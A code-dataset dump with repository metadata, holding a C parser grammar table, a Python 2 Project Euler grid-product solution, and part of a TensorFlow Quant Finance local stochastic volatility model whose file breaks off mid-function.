('unary_expression -> SIZEOF unary_expression','unary_expression',2,'p_unary_expression_3','parser.py',1688),
('unary_expression -> SIZEOF LPAREN type_name RPAREN','unary_expression',4,'p_unary_expression_3','parser.py',1689),
('unary_operator -> AND','unary_operator',1,'p_unary_operator','parser.py',1697),
('unary_operator -> TIMES','unary_operator',1,'p_unary_operator','parser.py',1698),
('unary_operator -> PLUS','unary_operator',1,'p_unary_operator','parser.py',1699),
('unary_operator -> MINUS','unary_operator',1,'p_unary_operator','parser.py',1700),
('unary_operator -> NOT','unary_operator',1,'p_unary_operator','parser.py',1701),
('unary_operator -> LNOT','unary_operator',1,'p_unary_operator','parser.py',1702),
('postfix_expression -> primary_expression','postfix_expression',1,'p_postfix_expression_1','parser.py',1707),
('postfix_expression -> postfix_expression LBRACKET expression RBRACKET','postfix_expression',4,'p_postfix_expression_2','parser.py',1711),
('postfix_expression -> postfix_expression LPAREN argument_expression_list RPAREN','postfix_expression',4,'p_postfix_expression_3','parser.py',1715),
('postfix_expression -> postfix_expression LPAREN RPAREN','postfix_expression',3,'p_postfix_expression_3','parser.py',1716),
('postfix_expression -> postfix_expression PERIOD ID','postfix_expression',3,'p_postfix_expression_4','parser.py',1721),
('postfix_expression -> postfix_expression PERIOD TYPEID','postfix_expression',3,'p_postfix_expression_4','parser.py',1722),
('postfix_expression -> postfix_expression ARROW ID','postfix_expression',3,'p_postfix_expression_4','parser.py',1723),
('postfix_expression -> postfix_expression ARROW TYPEID','postfix_expression',3,'p_postfix_expression_4','parser.py',1724),
('postfix_expression -> postfix_expression PLUSPLUS','postfix_expression',2,'p_postfix_expression_5','parser.py',1730),
('postfix_expression -> postfix_expression MINUSMINUS','postfix_expression',2,'p_postfix_expression_5','parser.py',1731),
('postfix_expression -> LPAREN type_name RPAREN brace_open initializer_list brace_close','postfix_expression',6,'p_postfix_expression_6','parser.py',1736),
('postfix_expression -> LPAREN type_name RPAREN brace_open initializer_list COMMA brace_close','postfix_expression',7,'p_postfix_expression_6','parser.py',1737),
('primary_expression -> identifier','primary_expression',1,'p_primary_expression_1','parser.py',1742),
('primary_expression -> constant','primary_expression',1,'p_primary_expression_2','parser.py',1746),
('primary_expression -> unified_string_literal','primary_expression',1,'p_primary_expression_3','parser.py',1750),
('primary_expression -> unified_wstring_literal','primary_expression',1,'p_primary_expression_3','parser.py',1751),
('primary_expression -> LPAREN expression RPAREN','primary_expression',3,'p_primary_expression_4','parser.py',1756),
('primary_expression -> OFFSETOF LPAREN type_name COMMA offsetof_member_designator RPAREN','primary_expression',6,'p_primary_expression_5','parser.py',1760),
('offsetof_member_designator -> identifier','offsetof_member_designator',1,'p_offsetof_member_designator','parser.py',1768),
('offsetof_member_designator -> offsetof_member_designator PERIOD identifier','offsetof_member_designator',3,'p_offsetof_member_designator','parser.py',1769),
('offsetof_member_designator -> offsetof_member_designator LBRACKET expression RBRACKET','offsetof_member_designator',4,'p_offsetof_member_designator','parser.py',1770),
('argument_expression_list -> assignment_expression','argument_expression_list',1,'p_argument_expression_list','parser.py',1783),
('argument_expression_list -> argument_expression_list COMMA assignment_expression','argument_expression_list',3,'p_argument_expression_list','parser.py',1784),
('identifier -> ID','identifier',1,'p_identifier','parser.py',1793),
('constant -> INT_CONST_DEC','constant',1,'p_constant_1','parser.py',1797),
('constant -> INT_CONST_OCT','constant',1,'p_constant_1','parser.py',1798),
('constant -> INT_CONST_HEX','constant',1,'p_constant_1','parser.py',1799),
('constant -> INT_CONST_BIN','constant',1,'p_constant_1','parser.py',1800),
('constant -> FLOAT_CONST','constant',1,'p_constant_2','parser.py',1819),
('constant -> HEX_FLOAT_CONST','constant',1,'p_constant_2','parser.py',1820),
('constant -> CHAR_CONST','constant',1,'p_constant_3','parser.py',1836),
('constant -> WCHAR_CONST','constant',1,'p_constant_3','parser.py',1837),
('unified_string_literal -> STRING_LITERAL','unified_string_literal',1,'p_unified_string_literal','parser.py',1848),
('unified_string_literal -> unified_string_literal STRING_LITERAL','unified_string_literal',2,'p_unified_string_literal','parser.py',1849),
('unified_wstring_literal -> WSTRING_LITERAL','unified_wstring_literal',1,'p_unified_wstring_literal','parser.py',1859),
('unified_wstring_literal -> unified_wstring_literal WSTRING_LITERAL','unified_wstring_literal',2,'p_unified_wstring_literal','parser.py',1860),
('brace_open -> LBRACE','brace_open',1,'p_brace_open','parser.py',1870),
('brace_close -> RBRACE','brace_close',1,'p_brace_close','parser.py',1876),
('empty -> <empty>','empty',0,'p_empty','parser.py',1882),
]
| [
"haoyuanwang102@gmail.com"
] | haoyuanwang102@gmail.com |
4890969158ca19bf54df4014f997c969351e991d | e003a165387aeda6b11886e4936e54915f88d913 | /p11.py | 160dd08b830018fd0a44c9f88a4ad88635b1cbf6 | [] | no_license | tommy-dk/projecteuler | 8ac45b591022edfdcb126bb0f79609531c799292 | 31bc327800040622b29ecfbeec64f746759e35fe | refs/heads/master | 2021-03-12T23:02:51.761085 | 2016-10-23T11:41:15 | 2016-10-23T11:41:15 | 1,524,751 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,518 | py | #!/usr/bin/env python
import time
st = time.time()
nums = (
( 8, 2,22,97,38,15, 0,40, 0,75, 4, 5, 7,78,52,12,50,77,91, 8,),
(49,49,99,40,17,81,18,57,60,87,17,40,98,43,69,48, 4,56,62, 0,),
(81,49,31,73,55,79,14,29,93,71,40,67,53,88,30, 3,49,13,36,65,),
(52,70,95,23, 4,60,11,42,69,24,68,56, 1,32,56,71,37, 2,36,91,),
(22,31,16,71,51,67,63,89,41,92,36,54,22,40,40,28,66,33,13,80,),
(24,47,32,60,99, 3,45, 2,44,75,33,53,78,36,84,20,35,17,12,50,),
(32,98,81,28,64,23,67,10,26,38,40,67,59,54,70,66,18,38,64,70,),
(67,26,20,68, 2,62,12,20,95,63,94,39,63, 8,40,91,66,49,94,21,),
(24,55,58, 5,66,73,99,26,97,17,78,78,96,83,14,88,34,89,63,72,),
(21,36,23, 9,75, 0,76,44,20,45,35,14, 0,61,33,97,34,31,33,95,),
(78,17,53,28,22,75,31,67,15,94, 3,80, 4,62,16,14, 9,53,56,92,),
(16,39, 5,42,96,35,31,47,55,58,88,24, 0,17,54,24,36,29,85,57,),
(86,56, 0,48,35,71,89, 7, 5,44,44,37,44,60,21,58,51,54,17,58,),
(19,80,81,68, 5,94,47,69,28,73,92,13,86,52,17,77, 4,89,55,40,),
( 4,52, 8,83,97,35,99,16, 7,97,57,32,16,26,26,79,33,27,98,66,),
(88,36,68,87,57,62,20,72, 3,46,33,67,46,55,12,32,63,93,53,69,),
( 4,42,16,73,38,25,39,11,24,94,72,18, 8,46,29,32,40,62,76,36,),
(20,69,36,41,72,30,23,88,34,62,99,69,82,67,59,85,74, 4,36,16,),
(20,73,35,29,78,31,90, 1,74,31,49,71,48,86,81,16,23,57, 5,54,),
( 1,70,54,71,83,51,54,69,16,92,33,48,61,43,52, 1,89,19,67,48,),
)
def right(x,y):
if x <= 20-4:
res = 1
for i in xrange(0,4):
res *= nums[y][x+i]
return res
else:
return 0
def down(x,y):
if y <= 20-4:
res = 1
for i in xrange(0,4):
res *= nums[y+i][x]
return res
else:
return 0
def diag_right(x,y):
if x <= 20-4 and y <= 20-4:
res = 1
for i in xrange(0,4):
res *= nums[y+i][x+i]
return res
else:
return 0
def diag_left(x,y):
if x >= 3 and y <= 20-4:
res = 1
for i in xrange(0,4):
res *= nums[y+i][x-i]
return res
else:
return 0
total = 0
for x in xrange(0,20):
for y in xrange(0,20):
res = right(x,y)
if res > total:
total = res
res = down(x,y)
if res > total:
total = res
res = diag_right(x,y)
if res > total:
total = res
res = diag_left(x,y)
if res > total:
total = res
print total
print "Time taken: %s" % str(time.time() - st)
| [
"tho@danskespil.dk"
] | tho@danskespil.dk |
2ae2ad897bb8822cbdc7b5ce0e30b526761062cd | 00cb5907750926f1a9b0fde97301f10d01f49645 | /tf_quant_finance/experimental/local_stochastic_volatility/local_stochastic_volatility_model.py | 0502cc8f587b533bfd4c7c39c011e4add8ee24ea | [
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-generic-cla"
] | permissive | dannyb2018/tf-quant-finance | 63761e4a39b615da6a5258e48030d2b12a142b26 | 668b4fb0f91b1f60c9015cef087b3e879ee2a4f7 | refs/heads/master | 2023-07-07T20:00:59.529305 | 2021-08-18T13:05:11 | 2021-08-18T13:05:51 | 284,707,826 | 0 | 0 | Apache-2.0 | 2020-08-03T13:29:15 | 2020-08-03T13:29:14 | null | UTF-8 | Python | false | false | 33,519 | py | # Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Local Stochastic Volatility process."""
import functools
import numpy as np
import tensorflow.compat.v2 as tf
from tf_quant_finance import datetime as dates
from tf_quant_finance import math
from tf_quant_finance.experimental import local_volatility as lvm
from tf_quant_finance.experimental.pricing_platform.framework.market_data import utils
from tf_quant_finance.math import pde
from tf_quant_finance.math.interpolation import linear
from tf_quant_finance.models import generic_ito_process
class LocalStochasticVolatilityModel(generic_ito_process.GenericItoProcess):
r"""Local stochastic volatility model.
Local stochastic volatility (LSV) models assume that the spot price of an
asset follows the following stochastic differential equation under the risk
neutral measure [1]:
```None
dS(t) / S(t) = (r - d) dt + sqrt(v(t)) * L(t, S(t)) * dW_s(t)
dv(t) = a(v(t)) dt + b(v(t)) dW_v(t)
E[dW_s(t)dW_v(t)] = rho dt
```
where `r` and `d` denote the risk free interest rate and dividend yield
respectively. `S(t)` is the spot price, `v(t)` denotes the stochastic variance
and the function `L(t, S(t))` is the leverage function which is calibrated
using the volatility smile data. The functions `a(v(t))` and `b(v(t))` denote
the drift and volitility of the stochastic process for the variance and `rho`
denotes the instantabeous correlation between the spot and the variance
process. LSV models thus combine the local volatility dynamics with
stochastic volatility.
Using the relationship between the local volatility and the expectation of
future instantaneous variance, leverage function can be computed as follows
[2]:
```
sigma(T,K)^2 = L(T,K)^2 * E[v(T)|S(T)=K]
```
where the local volatility function `sigma(T,K)` can be computed using the
Dupire's formula.
The `LocalStochasticVolatilityModel` class contains a generic implementation
of the LSV model with the flexibility to specify an arbitrary variance
process. The default variance process is a Heston type process with
mean-reverting variance (as in Ref. [1]):
```
dv(t) = k(m - v(t)) dt + alpha*sqrt(v(t)) dW_v(t)
```
#### References:
[1]: Iain J. Clark. Foreign exchange option pricing - A Practitioner's
guide. Chapter 5. 2011.
[2]: I. Gyongy. Mimicking the one-dimensional marginal distributions of
processes having an ito differential. Probability Theory and Related
Fields, 71, 1986.
"""
def __init__(self,
leverage_fn,
variance_process,
risk_free_rate=None,
dividend_yield=None,
rho=None,
dtype=None,
name=None):
"""Initializes the Local stochastic volatility model.
Args:
leverage_fn: A Python callable which returns the Leverage function
`L(t, S(t))` as a function of state and time. The function must accept
a scalar `Tensor` corresponding to time 't' and a real `Tensor` of shape
`[num_samples, 1]` corresponding to the underlying price (S) as
inputs and return a real `Tensor` containing the leverage function
computed at (S,t).
variance_process: An instance of `ItoProcess` specifying the
dynamics of the variance process of the LSV model. The
`variance_process` should implement a one-factor stochastic process.
For the common version of Heston like variance model use
`LSVVarianceModel`.
risk_free_rate: An optional scalar real `Tensor` specifying the
(continuously compounded) risk free interest rate. If the underlying is
an FX rate, then use this input to specify the domestic interest rate.
Note that the current implementation supports constant interest rates
and dividend yield.
Default value: `None` in which case the input is set to zero.
dividend_yield: An optional real scalar `Tensor` specifying the
(continuosly compounded) dividend yield. If the underlying is an FX
rate, then use this input to specify the foreign interest rate.
Note that the currect implementation supports constant interest rates
and dividend yield.
Default value: `None` in which case the input is set to zero.
rho: A real scalar `Tensor` specifying the correlation between the
underlying spot price and the variance process.
Default value: `None` in which case cross correlations are assumed
to be zero.
dtype: The default dtype to use when converting values to `Tensor`s.
Default value: `None` which means that default dtypes inferred by
TensorFlow are used.
name: Python string. The name to give to the ops created by this class.
Default value: `None` which maps to the default name
`local_stochastic_volatility_model`.
"""
self._name = name or "local_stochastic_volatility_model"
with tf.name_scope(self._name):
if risk_free_rate is None:
risk_free_rate = 0.0
if dividend_yield is None:
dividend_yield = 0.0
self._risk_free_rate = tf.convert_to_tensor(risk_free_rate, dtype=dtype)
self._dtype = dtype or self._domestic_rate.dtype
self._dividend_yield = tf.convert_to_tensor(dividend_yield, dtype=dtype)
self._leverage_fn = leverage_fn
self._variance_process = variance_process
dim = 1 + variance_process.dim()
rho = rho or 0.0
self._rho = _create_corr_matrix(rho, self._dtype)
self._sqrt_rho = tf.linalg.cholesky(self._rho)
def _vol_fn(t, state):
"""Volatility function of LSV model."""
num_samples = state.shape.as_list()[0]
broadcasted_t = tf.broadcast_to(t, [1, num_samples])
spot_prices = state[:, 0]
variance = state[:, 1:]
level_fun = self._leverage_fn(
broadcasted_t, tf.expand_dims(spot_prices, axis=0))
spot_diffusion = tf.expand_dims(
level_fun[0, :], axis=-1) * tf.expand_dims(
spot_prices, axis=-1) * tf.math.sqrt(variance)
variance_diffusion = self._variance_process.volatility_fn()(
t, variance)
diffusion = tf.concat([spot_diffusion, variance_diffusion], axis=1)
diffusion = tf.expand_dims(diffusion, axis=-2)
return diffusion * self._sqrt_rho
# Drift function
def _drift_fn(t, state):
"""Drift function of LSV model."""
spot_drift = (
self._risk_free_rate - self._dividend_yield) * state[:, :1]
variance_drift = self._variance_process.drift_fn()(t, state[:, 1:])
return tf.concat([spot_drift, variance_drift], axis=1)
super(LocalStochasticVolatilityModel,
self).__init__(dim, _drift_fn, _vol_fn, self._dtype, self._name)
@classmethod
def from_market_data(cls,
valuation_date,
expiry_dates,
strikes,
implied_volatilities,
variance_process,
initial_spot,
initial_variance,
rho=None,
risk_free_rate=None,
dividend_yield=None,
time_step=None,
num_grid_points=None,
grid_minimums=None,
grid_maximums=None,
dtype=None):
"""Creates a `LocalStochasticVolatilityModel` from market data.
This function computes the leverage function for the LSV model by first
computing the joint probability density function `p(t, X(t), v(t))` where
`X(t)` is the log of the spot price and `v(t)` is the variance at time `t`.
The joint probablity density is computed using the Fokker-Planck equation of
the LSV model (see 6.8.2 in Ref [1]):
```None
dp/dt = 1/2 d^2 [v L(t,X)^2 p]/dX^2 + 1/2 d^2 [b(v)^2 p]/dv^2 +
rho d^2 [sqrt(v)L(t,X)b(v) p]/dXdv -
d[(r - d - 1/2 v L(t,X)^2)p]/dX -
d[a(v) p]/dv
```
where `a(v)` and `b(v)` are the drift and diffusion functions for the
variance process. Defining
```None
I_n(k,t) = int v^n p(t, k, v) dv
```
we can calculate the leverage function as follows:
```None
L(k, t) = sigma(exp(k), t) sqrt(I_0(k, t)/I_1(k, t)).
```
Note that the computation of `I_0` and `I_1` require the knowledge of
leverage function and hence the computation of the leverage function is
implicit in nature.
Args:
valuation_date: A scalar `DateTensor` specifying the valuation
(or settlement) date for the market data.
expiry_dates: A `DateTensor` of shape `(num_expiries,)` containing the
expiry dates on which the implied volatilities are specified.
strikes: A `Tensor` of real dtype and shape `(num_expiries,
num_strikes)` specifying the strike prices at which implied volatilities
are specified.
implied_volatilities: A `Tensor` of real dtype and shape `(num_expiries,
num_strikes)` specifying the implied volatilities.
variance_process: An instance of `LSVVarianceModel` or
`ItoProcess` specifying the dynamics of the variance process of
the LSV model.
initial_spot: A real scalar `Tensor` specifying the underlying spot price
on the valuation date.
initial_variance: A real scalar `Tensor` specifying the initial variance
on the valuation date.
rho: A real scalar `Tensor` specifying the correlation between spot price
and the stochastic variance.
risk_free_rate: A real scalar `Tensor` specifying the (continuosly
compounded) risk free interest rate. If the underlying is an FX rate,
then use this input to specify the domestic interest rate.
Default value: `None` in which case the input is set to zero.
dividend_yield: A real scalar `Tensor` specifying the (continuosly
compounded) divident yield. If the underlying is an FX rate, then use
this input to specify the foreign interest rate.
Default value: `None` in which case the input is set to zero.
time_step: A real scalar `Tensor` specifying the time step during the
numerical solution of the Fokker-Planck PDE.
Default value: None, in which case `time_step` corresponding to 100 time
steps is used.
num_grid_points: A scalar integer `Tensor` specifying the number of
discretization points for each spatial dimension.
Default value: None, in which case number of grid points is set to 100.
grid_minimums: An optional `Tensor` of size 2 containing the minimum grid
points for PDE spatial discretization. `grid_minimums[0]` correspond
to the minimum spot price in the spatial grid and `grid_minimums[1]`
correspond to the minimum variance value.
grid_maximums: An optional `Tensor` of size 2 containing the maximum grid
points for PDE spatial discretization. `grid_maximums[0]` correspond
to the maximum spot price in the spatial grid and `grid_maximums[1]`
correspond to the maximum variance value.
dtype: The default dtype to use when converting values to `Tensor`s.
Default value: `None` which means that default dtypes inferred by
TensorFlow are used.
Returns:
An instance of `LocalStochasticVolatilityModel` constructed using the
input data.
"""
if risk_free_rate is None:
discount_factor_fn = lambda t: tf.ones_like(t, dtype=dtype)
else:
r = tf.convert_to_tensor(risk_free_rate, dtype=dtype)
discount_factor_fn = lambda t: tf.math.exp(-r * t)
lv_model = lvm.LocalVolatilityModel.from_market_data(
dim=1,
valuation_date=valuation_date,
expiry_dates=expiry_dates,
strikes=strikes,
implied_volatilities=implied_volatilities,
spot=initial_spot,
discount_factor_fn=discount_factor_fn,
dividend_yield=dividend_yield,
dtype=dtype)
dtype = dtype or lv_model.dtype()
max_time = tf.math.reduce_max(
dates.daycount_actual_365_fixed(
start_date=valuation_date, end_date=expiry_dates, dtype=dtype))
if time_step is None:
time_step = max_time / 100.0
rho = rho or 0.0
num_grid_points = num_grid_points or 100
leverage_fn = _leverage_function_using_pde(
risk_free_rate=risk_free_rate,
dividend_yield=dividend_yield,
lv_model=lv_model,
variance_model=variance_process,
rho=[rho],
initial_spot=initial_spot,
initial_variance=initial_variance,
time_step=time_step,
max_time=max_time,
num_grid_points=num_grid_points,
grid_minimums=grid_minimums,
grid_maximums=grid_maximums,
dtype=dtype)
return LocalStochasticVolatilityModel(
leverage_fn,
variance_process,
risk_free_rate=risk_free_rate,
dividend_yield=dividend_yield,
rho=rho,
dtype=dtype)
@classmethod
def from_volatility_surface(cls,
implied_volatility_surface,
variance_process,
initial_spot,
initial_variance,
rho=None,
risk_free_rate=None,
dividend_yield=None,
time_step=None,
num_grid_points=None,
grid_minimums=None,
grid_maximums=None,
dtype=None):
"""Creates a `LocalStochasticVolatilityModel` from volatility surface.
This function computes the leverage function for the LSV model by first
computing the joint probablity density function `p(t, X(t), v(t))` where
`X(t)` is the log of the spot price and `v(t)` is the variance at time `t`.
The joint probablity density is computed using the Fokker-Planck equation of
the LSV model (see 6.8.2 in Ref [1]):
```None
dp/dt = 1/2 d^2 [v L(t,X)^2 p]/dX^2 + 1/2 d^2 [b(v)^2 p]/dv^2 +
rho d^2 [sqrt(v)L(t,X)b(v) p]/dXdv -
d[(r - d - 1/2 v L(t,X)^2)p]/dX -
d[a(v) p]/dv
```
where `a(v)` and `b(v)` are the drift and diffusion functions for the
variance process. Defining
```None
I_n(k,t) = int v^n p(t, k, v) dv
```
we can calculate the leverage function as follows:
```None
L(k, t) = sigma(exp(k), t) sqrt(I_0(k, t)/I_1(k, t)).
```
Args:
implied_volatility_surface: Either an instance of
`processed_market_data.VolatilitySurface` or a Python object containing
the implied volatility market data. If the input is a Python object,
then the object must implement a function `volatility(strike,
expiry_times)` which takes real `Tensor`s corresponding to option
strikes and time to expiry and returns a real `Tensor` containing the
correspoding market implied volatility.
variance_process: An instance of `LSVVarianceModel` or
`ItoProcess`specifying the dynamics of the variance process of
the LSV model.
initial_spot: A real scalar `Tensor` specifying the underlying spot price
on the valuation date.
initial_variance: A real scalar `Tensor` specifying the initial variance
on the valuation date.
rho: A real scalar `Tensor` specifying the correlation between spot price
and the stochastic variance.
risk_free_rate: A real scalar `Tensor` specifying the (continuosly
compounded) risk free interest rate. If the underlying is an FX rate,
then use this input to specify the domestic interest rate.
Default value: `None` in which case the input is set to zero.
dividend_yield: A real scalar `Tensor` specifying the (continuosly
compounded) divident yield. If the underlying is an FX rate, then use
this input to specify the foreign interest rate.
Default value: `None` in which case the input is set to zero.
time_step: An optional real scalar `Tensor` specifying the time step
during the numerical solution of the Fokker-Planck PDE.
Default value: None, in which case `time_step` corresponding to 100 time
steps is used.
num_grid_points: A scalar integer `Tensor` specifying the number of
discretization points for each spatial dimension.
Default value: None, in which case number of grid points is set to 100.
grid_minimums: An optional `Tensor` of size 2 containing the minimum grid
points for PDE spatial discretization. `grid_minimums[0]` correspond
to the minimum spot price in the spatial grid and `grid_minimums[1]`
correspond to the minimum variance value.
grid_maximums: An optional `Tensor` of size 2 containing the maximum grid
points for PDE spatial discretization. `grid_maximums[0]` correspond
to the maximum spot price in the spatial grid and `grid_maximums[1]`
correspond to the maximum variance value.
dtype: The default dtype to use when converting values to `Tensor`s.
Default value: `None` which means that default dtypes inferred by
TensorFlow are used.
Returns:
An instance of `LocalStochasticVolatilityModel` constructed using the
input data.
"""
if risk_free_rate is None:
discount_factor_fn = lambda t: tf.ones_like(t, dtype=dtype)
else:
r = tf.convert_to_tensor(risk_free_rate, dtype=dtype)
discount_factor_fn = lambda t: tf.math.exp(-r * t)
lv_model = lvm.LocalVolatilityModel.from_volatility_surface(
dim=1,
spot=initial_spot,
implied_volatility_surface=implied_volatility_surface,
discount_factor_fn=discount_factor_fn,
dividend_yield=dividend_yield,
dtype=dtype)
dtype = dtype or lv_model.dtype()
day_count_fn = utils.get_daycount_fn(
implied_volatility_surface.daycount_convention)
max_time = tf.math.reduce_max(
day_count_fn(
start_date=implied_volatility_surface.settlement_date(),
end_date=implied_volatility_surface.node_expiries()))
if time_step is None:
time_step = max_time / 100.0
rho = rho or 0.0
num_grid_points = num_grid_points or 100
leverage_fn = _leverage_function_using_pde(
risk_free_rate=risk_free_rate,
dividend_yield=dividend_yield,
lv_model=lv_model,
variance_model=variance_process,
rho=[rho],
initial_spot=initial_spot,
initial_variance=initial_variance,
time_step=time_step,
max_time=max_time,
num_grid_points=num_grid_points,
grid_minimums=grid_minimums,
grid_maximums=grid_maximums,
dtype=dtype)
return LocalStochasticVolatilityModel(
leverage_fn,
variance_process,
risk_free_rate=risk_free_rate,
dividend_yield=dividend_yield,
rho=rho,
dtype=dtype)
def _create_corr_matrix(rho, dtype):
"""Create correlation matrix with scalar `rho`."""
one = tf.constant(1.0, dtype=dtype)
m1 = tf.concat([one, rho], axis=0)
m2 = tf.concat([rho, one], axis=0)
return tf.stack([m1, m2])
def _machine_eps(dtype):
"""Returns the machine epsilon for the supplied dtype."""
dtype = tf.as_dtype(dtype).as_numpy_dtype
eps = 1e-6 if dtype == np.float32 else 1e-10
return eps
def _two_d_integration(grid, value_grid):
"""Perform 2-D integration numerically."""
log_spot_grid, variance_grid = tf.meshgrid(*grid)
delta_v = variance_grid[1:, :] - variance_grid[:-1, :]
delta_s = log_spot_grid[:, 1:] - log_spot_grid[:, :-1]
integral = tf.math.reduce_sum(value_grid[0, :-1, :] * delta_v, axis=0)
integral = tf.math.reduce_sum(integral[:-1] * delta_s[0, :])
return integral
# TODO(b/175023506): Move to `grids` module
def _tavella_randell_nonuniform_grid(x_min, x_max, x_star, num_grid_points,
alpha, dtype):
"""Creates non-uniform grid clustered around a specified point.
Args:
x_min: A real `Tensor` of shape `(dim,)` specifying the lower limit of the
grid.
x_max: A real `Tensor` of same shape and dtype as `x_min` specifying the
upper limit of the grid.
x_star: A real `Tensor` of same shape and dtype as `x_min` specifying the
location on the grid around which higher grid density is desired.
num_grid_points: A scalar integer `Tensor` specifying the number of points
on the grid.
alpha: A scalar parameter which controls the degree of non-uniformity of the
grid. The smaller values of `alpha` correspond to greater degree of
clustering around `x_star`.
dtype: The default dtype to use when converting values to `Tensor`s.
Returns:
A real `Tensor` of shape `(dim, num_grid_points+1)` containing the
non-uniform grid.
"""
c1 = tf.math.asinh((x_min - x_star) / alpha)
c2 = tf.math.asinh((x_max - x_star) / alpha)
i = tf.expand_dims(tf.range(0, num_grid_points + 1, 1, dtype=dtype), axis=-1)
grid = x_star + alpha * tf.math.sinh(c2 * i / num_grid_points + c1 *
(1 - i / num_grid_points))
# reshape from (num_grid_points+1, dim) to (dim, num_grid_points+1)
return tf.transpose(grid)
def _conditional_expected_variance_from_pde_solution(grid, value_grid, dtype):
"""Computes E[variance|log_spot=k]."""
# value_grid.shape = [1, num_x, num_y]
log_spot_grid, variance_grid = tf.meshgrid(*grid)
delta_s = variance_grid[1:, :] - variance_grid[:-1, :]
# Calculate I(0)
integral_0 = tf.math.reduce_sum(value_grid[0, :-1, :] * delta_s, axis=0)
# Calculate I(1)
integral_1 = tf.math.reduce_sum(
variance_grid[:-1, :] * value_grid[0, :-1, :] * delta_s, axis=0)
variance_given_logspot = tf.math.divide_no_nan(integral_1, integral_0)
return functools.partial(
linear.interpolate,
x_data=log_spot_grid[0, :],
y_data=variance_given_logspot,
dtype=dtype)
def _leverage_function_using_pde(*, risk_free_rate, dividend_yield, lv_model,
variance_model, rho, initial_spot,
initial_variance, max_time, time_step,
num_grid_points, grid_minimums,
grid_maximums, dtype):
"""Computes Leverage function using Fokker-Planck PDE for joint density.
This function computes the leverage function for the LSV model by first
computing the joint probablity density function `p(t, X(t), v(t))` where
`X(t)` is the log of the spot price and `v(t)` is the variance at time `t`.
The joint probablity density is computed using the Fokker-Planck equation of
the LSV model (see 6.8.2 in Ref [1]):
```None
dp/dt = 1/2 d^2 [v L(t,X)^2 p]/dX^2 + 1/2 d^2 [b(v)^2 p]/dv^2 +
rho d^2 [sqrt(v)L(t,X)b(v) p]/dXdv - d[(r - d - 1/2 v L(t,X)^2)p]/dX -
d[a(v) p]/dv
```
where `a(v)` and `b(v)` are the drift and diffusion functions for the
variance process. Defining
```None
I_n(k,t) = int v^n p(t, k, v) dv
```
we can calculate the leverage function as follows:
```None
L(k, t) = sigma(exp(k), t) sqrt(I_0(k, t)/I_1(k, t)).
```
Args:
risk_free_rate: A scalar real `Tensor` specifying the (continuosly
compounded) risk free interest rate. If the underlying is an FX rate, then
use this input to specify the domestic interest rate.
dividend_yield: A real scalar `Tensor` specifying the (continuosly
compounded) dividend yield. If the underlying is an FX rate, then use this
input to specify the foreign interest rate.
lv_model: An instance of `LocalVolatilityModel` specifying the local
volatility for the spot price.
variance_model: An instance of `LSVVarianceModel` specifying the dynamics of
the variance process of the LSV model.
rho: A real scalar `Tensor` specifying the correlation between spot price
and the stochastic variance.
initial_spot: A real scalar `Tensor` specifying the underlying spot price on
the valuation date.
initial_variance: A real scalar `Tensor` specifying the initial variance on
the valuation date.
max_time: A real scalar `Tensor` specifying the maximum time to which the
Fokker-Planck PDE is evolved.
time_step: A real scalar `Tensor` specifying the time step during the
numerical solution of the Fokker-Planck PDE.
num_grid_points: A scalar integer `Tensor` specifying the number of
discretization points for each spatial dimension.
grid_minimums: An optional `Tensor` of size 2 containing the minimum grid
points for PDE spatial discretization. `grid_minimums[0]` correspond
to the minimum spot price in the spatial grid and `grid_minimums[1]`
correspond to the minimum variance value.
grid_maximums: An optional `Tensor` of size 2 containing the maximum grid
points for PDE spatial discretization. `grid_maximums[0]` correspond
to the maximum spot price in the spatial grid and `grid_maximums[1]`
correspond to the maximum variance value.
dtype: The default dtype to use when converting values to `Tensor`s.
Returns:
A Python callable which computes the Leverage function `L(t, S(t))`. The
function accepts a scalar `Tensor` corresponding to time 't' and a real
`Tensor` of shape `[num_samples, 1]` corresponding to the spot price (S) as
inputs and return a real `Tensor` corresponding to the leverage function
computed at (S,t).
"""
if variance_model.dim() > 1:
raise ValueError("The default model of Leverage function doesn\'t support "
"the variance process with more than 1 factor.")
pde_grid_tol = _machine_eps(dtype)
rho = tf.convert_to_tensor(rho, dtype=dtype)
initial_spot = tf.convert_to_tensor(initial_spot, dtype=dtype)
initial_log_spot = tf.math.log(
tf.convert_to_tensor(initial_spot, dtype=dtype))
initial_variance = tf.convert_to_tensor(initial_variance, dtype=dtype)
risk_free_rate = tf.convert_to_tensor(risk_free_rate, dtype=dtype)
dividend_yield = tf.convert_to_tensor(dividend_yield, dtype=dtype)
rho = tf.convert_to_tensor(rho, dtype=dtype)
x_scale = initial_log_spot
y_scale = initial_variance
# scaled log spot = log(spot/initial_spot)
# scaled variance = variance / initial_variance
scaled_initial_point = tf.convert_to_tensor([0.0, 1.0], dtype=dtype)
# These are minimums and maximums for scaled log spot and scaled variance
if grid_minimums is None:
grid_minimums = [0.01, 0.0001]
else:
grid_minimums = tf.convert_to_tensor(grid_minimums, dtype=dtype)
grid_minimums = [grid_minimums[0] / initial_spot,
grid_minimums[1] / initial_variance]
if grid_maximums is None:
grid_maximums = [10.0, 5.0]
else:
grid_maximums = tf.convert_to_tensor(grid_maximums, dtype=dtype)
grid_maximums = [grid_maximums[0] / initial_spot,
grid_maximums[1] / initial_variance]
log_spot_min = tf.math.log(
tf.convert_to_tensor([grid_minimums[0]], dtype=dtype))
log_spot_max = tf.math.log(
tf.convert_to_tensor([grid_maximums[0]], dtype=dtype))
variance_min = tf.convert_to_tensor([grid_minimums[1]], dtype=dtype)
variance_max = tf.convert_to_tensor([grid_maximums[1]], dtype=dtype)
grid_minimums = tf.concat([log_spot_min, variance_min], axis=0)
grid_maximums = tf.concat([log_spot_max, variance_max], axis=0)
grid = _tavella_randell_nonuniform_grid(grid_minimums, grid_maximums,
scaled_initial_point, num_grid_points,
0.3, dtype)
grid = [tf.expand_dims(grid[0], axis=0), tf.expand_dims(grid[1], axis=0)]
delta_x = tf.math.reduce_min(grid[0][0, 1:] - grid[0][0, :-1])
